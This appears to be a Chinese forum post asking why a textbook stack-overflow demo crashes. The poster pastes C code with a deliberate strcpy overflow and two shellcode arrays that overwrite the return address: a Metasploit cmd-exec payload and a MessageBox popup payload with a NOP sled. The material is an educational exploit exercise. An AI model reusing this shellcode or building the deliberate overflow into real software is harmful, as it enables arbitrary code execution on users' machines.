|
|
|---|---|
|
|
还有个问题:
|
|
|
我把代码改成以下代码了
输入abcdefgh后覆盖到返回地址, 但还是遇到了死循环的问题, 双击debug/xxx.exe,输入abcdefgh后发生异常,程序退出。 /*****************************************************************************
To be the apostrophe which changed "Impossible" into "I'm possible"!
POC code of chapter 4.2 in book "Vulnerability Exploit and Analysis Technique"
file name : stack_overflow_var.c
author : failwest
date : 2006.9.20
description : demo show nearby var overrun in stack
input 8 letters to bypass authentication
Noticed : complied with VC6.0 and build into begug version
version : 1.0
E-mail : failwest@gmail.com
Only for educational purposes enjoy the fun from exploiting :)
******************************************************************************/
#include <stdio.h>
#include <windows.h>
#define PASSWORD "1234567"
/* win32_exec - EXITFUNC=seh CMD=cmd /c echo 123d:/shellcode.txt Size=188+8 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x2b\xc9\x83\xe9\xd7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
"\xf4\xfe\x17\x83\xeb\xfc\xe2\xf4\x1c\x1c\xba\x17\xe0\xf4\x75\x52"
"\xdc\x7f\x82\x12\x98\xf5\x11\x9c\xaf\xec\x75\x48\xc0\xf5\x15\x5e"
"\x6b\xc0\x75\x16\x0e\xc5\x3e\x8e\x4c\x70\x3e\x63\xe7\x35\x34\x1a"
"\xe1\x36\x15\xe3\xdb\xa0\xda\x13\x95\x11\x75\x48\xc4\xf5\x15\x71"
"\x6b\xf8\xb5\x9c\xbf\xe8\xff\xfc\x6b\xe8\x75\x16\x0b\x7d\xa2\x33"
"\xe4\x37\xcf\xd7\x84\x7f\xbe\x27\x65\x34\x86\x1b\x6b\xb4\xf2\x9c"
"\x90\xe8\x53\x9c\x88\xfc\x15\x1e\x6b\x74\x4e\x17\xe0\xf4\x75\x7f"
"\xdc\xab\xcf\xe1\x80\xa2\x15\x1a\x88\x04\x74\x13\xbf\x9c\x66\xe9"
"\x6a\xfa\xa9\xe8\x07\x1c\x10\xe8\x1f\x0b\x9d\x7a\x84\xd4\xd1\x74"
"\xc0\x91\x9d\x7f\x8f\xd4\xcf\x25\xd3\xca\xc0\x73\xda\xdb\x8d\x7f"
"\x85\x98\x92\x74\x8f\x90\x9b\x39\x94\x8c\x8a\x17";
char failwest_popup[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
"\x90\x90\x90\x90"
"\x70\xFA\x13\x00";
int verify_password (char *password)
{
int authenticated;
char buffer[200];// add local buff
authenticated=strcmp(password,PASSWORD);
strcat(password,failwest_popup);
strcpy(buffer,password);//over flowed here!
return authenticated;
}
main()
{
int valid_flag=0;
char password[1024];
/*
__asm{
lea eax,scode
call eax
}
*/
while(1)
{
printf("please input password: ");
scanf("%s",password);
LoadLibrary("user32.dll");//prepare for messagebox
valid_flag = verify_password(password);
if(valid_flag)
{
printf("incorrect password!\n\n");
}
else
{
printf("Congratulation! You have passed the verification!\n");
break;
}
}
}
 
|
|
|
|
|
|
|
|
|
|
|
|
|
